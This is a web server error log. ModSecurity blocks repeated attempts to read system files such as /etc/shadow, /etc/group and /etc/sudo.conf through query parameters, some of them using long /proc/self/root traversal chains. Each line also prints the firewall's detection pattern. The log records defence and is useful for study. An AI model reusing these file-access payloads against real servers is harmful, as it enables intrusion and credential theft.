[Fri Mar 20 07:39:24.605386 2026] [:error] [pid 21219:tid 140411683178240] [client 216.73.216.191:8039] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j3PXLqtnMIWvjpaKWYgAAAoc"]
[Fri Mar 20 07:39:24.605968 2026] [:error] [pid 11642:tid 140411699963648] [client 216.73.216.191:17746] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j27ninkcc-iUj5Apa3gAAA4U"]
[Fri Mar 20 07:39:24.715525 2026] [:error] [pid 31215:tid 140411616036608] [client 216.73.216.191:5792] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j3AF0L0L-SsrnPo5k4gAAAs8"]
[Fri Mar 20 07:39:24.735064 2026] [:error] [pid 31215:tid 140411725141760] [client 216.73.216.191:1118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j3AF0L0L-SsrnPo5k4wAAAsI"]
[Fri Mar 20 07:39:24.847895 2026] [:error] [pid 11642:tid 140411590858496] [client 216.73.216.191:17746] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j3Lninkcc-iUj5Apa4AAAA5I"]
[Fri Mar 20 07:39:24.939513 2026] [:error] [pid 31215:tid 140411548894976] [client 216.73.216.191:1118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j3AF0L0L-SsrnPo5k5AAAAtc"]
[Fri Mar 20 07:39:33.948942 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:49322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0j5eoXxyEfFpUF8f99nQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:39:37.827591 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:60452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0j5_XLqtnMIWvjpaKWbAAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:39:54.987669 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:49952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0j-vqxLDW4GITHUkTjGQAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:40:07.957780 2026] [mime_magic:error] [pid 21219:tid 140411641214720] (70014)End of file found: [client 57.141.18.123:50718] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:40:11.083186 2026] [mime_magic:error] [pid 11167:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:50986] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:40:18.745775 2026] [mime_magic:error] [pid 11167:tid 140411590858496] (70014)End of file found: [client 57.141.18.1:51560] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:40:19.020912 2026] [mime_magic:error] [pid 7893:tid 140411733534464] (70014)End of file found: [client 57.141.18.18:51588] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:40:20.833775 2026] [mime_magic:error] [pid 7893:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:51706] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:40:31.165262 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.243.128:54804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kH_HIg5MgXLBnicP0ZQAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:40:32.161067 2026] [:error] [pid 7893:tid 140411725141760] [client 216.73.216.191:42826] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIBCii7xarUs8iHZkVgAAAgI"]
[Fri Mar 20 07:40:32.287206 2026] [:error] [pid 7893:tid 140411590858496] [client 216.73.216.191:42826] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIBCii7xarUs8iHZkVwAAAhI"]
[Fri Mar 20 07:40:32.405413 2026] [:error] [pid 26799:tid 140411691570944] [client 216.73.216.191:56772] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kINa6ubjKNq_cu4bQuwAAA0Y"]
[Fri Mar 20 07:40:32.435413 2026] [:error] [pid 9818:tid 140411733534464] [client 216.73.216.191:49465] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIF1pVZ5mVmJwsFMseAAAAEE"]
[Fri Mar 20 07:40:32.480961 2026] [:error] [pid 21219:tid 140411624429312] [client 216.73.216.191:1351] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIPXLqtnMIWvjpaKWrwAAAo4"]
[Fri Mar 20 07:40:32.551723 2026] [:error] [pid 26799:tid 140411574073088] [client 216.73.216.191:56772] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kINa6ubjKNq_cu4bQvAAAA1Q"]
[Fri Mar 20 07:40:32.570968 2026] [:error] [pid 9818:tid 140411599251200] [client 216.73.216.191:49465] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIF1pVZ5mVmJwsFMseQAAAFE"]
[Fri Mar 20 07:40:32.594887 2026] [:error] [pid 10189:tid 140411624429312] [client 216.73.216.191:6737] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIDJ3M9BSuKP7CAYXEQAAAI4"]
[Fri Mar 20 07:40:32.615530 2026] [:error] [pid 21219:tid 140411649607424] [client 216.73.216.191:1351] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIPXLqtnMIWvjpaKWsAAAAos"]
[Fri Mar 20 07:40:32.659863 2026] [:error] [pid 7893:tid 140411649607424] [client 216.73.216.191:16843] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIBCii7xarUs8iHZkWAAAAgs"]
[Fri Mar 20 07:40:32.693223 2026] [:error] [pid 26799:tid 140411582465792] [client 216.73.216.191:56772] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kINa6ubjKNq_cu4bQvQAAA1M"]
[Fri Mar 20 07:40:32.782378 2026] [:error] [pid 21219:tid 140411733534464] [client 216.73.216.191:1351] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kIPXLqtnMIWvjpaKWsQAAAoE"]
[Fri Mar 20 07:40:32.886678 2026] [:error] [pid 26799:tid 140411649607424] [client 216.73.216.191:56772] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0kINa6ubjKNq_cu4bQvgAAA0s"]
[Fri Mar 20 07:40:35.005097 2026] [:error] [pid 9818:tid 140411658000128] [client 216.73.216.191:52426] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kIV1pVZ5mVmJwsFMsewAAAEo"]
[Fri Mar 20 07:40:35.014342 2026] [:error] [pid 26799:tid 140411733534464] [client 216.73.216.191:52428] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kIda6ubjKNq_cu4bQvwAAA0E"]
[Fri Mar 20 07:40:37.459927 2026] [:error] [pid 21219:tid 140411540502272] [client 216.73.216.191:52640] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt-0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0kJfXLqtnMIWvjpaKWtwAAApg"]
